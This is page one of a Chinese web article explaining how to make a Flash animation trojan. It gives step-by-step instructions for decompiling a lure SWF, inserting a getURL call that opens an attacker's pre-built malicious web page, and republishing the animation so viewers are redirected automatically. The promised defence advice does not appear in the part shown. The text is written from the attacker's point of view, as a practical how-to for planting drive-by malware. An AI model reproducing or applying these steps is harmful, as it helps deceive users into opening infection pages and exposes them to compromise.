Flash木马是怎么做成的？

在网站上观看Flash动画，接收到“好友”发来的一张Flash贺卡，甚至于一个QQ魔法表情，一不留神就中了一个木马！Flash动画木马可以说是无处不在，攻击威力和覆盖面极其广。许多朋友一定想了解Flash木马的原理，想知道攻击者是如何在SWF中插入木马的呢？我们应该怎么样来防范Flash木马呢？

一、制作Flash动画木马的准备

Flash动画木马的原理，是在网页中显示或本地直接播放Flash动画木马时，让Flash自动打开一个网址，而该网址就是我们预先制作好的一个木马网页。也就是说，在制作网页木马前，我们首先需要制作好一个网页木马，并将它放置到某个网站上去。

另外，我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”，以及Flash动画反编译工具“闪客精灵”，编辑工具Macromedia Flash MX。

二、最原始的Flash木马

现在虽然有了许多各种各样的Flash动画木马制作工具，但是为了了解Flash动画木马的最基本原理，有必要从头开始用最原始的方法制作一个Flash木马。

步骤一：反编译SWF动画

首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”，反编译成可编辑的.fla格式。运行“闪客精灵”，点击菜单“文件”→“快速打开”命令，指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令，将动画导出为“MM热舞.fla”文件。

步骤二：插入网页木马代码

然后运行Flash动画编辑器Macromedia Flash MX，点击菜单“文件”→“打开”，调入刚才保存的fla文件。展开界面下方的“动作/帧”栏，再展开“动作”→“浏览器/网络”项，点击其中的“getURL”命令，在右边窗口中的“URL”里面输入我们的网页木马地址；窗口方式为“_blank”；“变量”设置为“使用GET方式发送”，在下方的代码窗口中将出现“getURL（"http://网页木马地址", "_blank", "GET"）;”。

步骤三：生成Flash木马

设置完毕后保存文件，并点击菜单“文件”→“发布”命令，将动画重新导出为SWF格式。用IE浏览器打开刚才生成的Flash动画木马，可以看到随着Flash动画打开播放时，自动弹出一个浏览器窗口，里面将会显示我们的木马网页。

【内容导航】
第1页：Flash木马是怎么做成的？	第2页：Flash木马是怎么做成的？

做个病毒猎手教你如何捕获电脑病毒样本[注意]电脑间谍入侵你的电脑窃取你的秘密相关资讯木马 Flash木马

木马的自我修炼：金融恶意程序f0xy （02/03/2015 09:24:18）
恶意软件趋势：跨平台恶意软件崛起（11/12/2012 12:04:05）
Zemra 木马源代码泄露（07/04/2012 07:37:03）

安全研究人员：更多木马将目标锁定（11/22/2012 09:29:20）
McAfee：90%成移动恶意程序锁定（09/07/2012 05:46:33）
Flame恶意软件被设计为可窃取图纸（06/06/2012 01:35:29）

本文评论查看全部评论（0）

评论声明

尊重网上道德，遵守中华人民共和国的各项有关法律法规
承担一切因您的行为而直接或间接导致的民事或刑事法律责任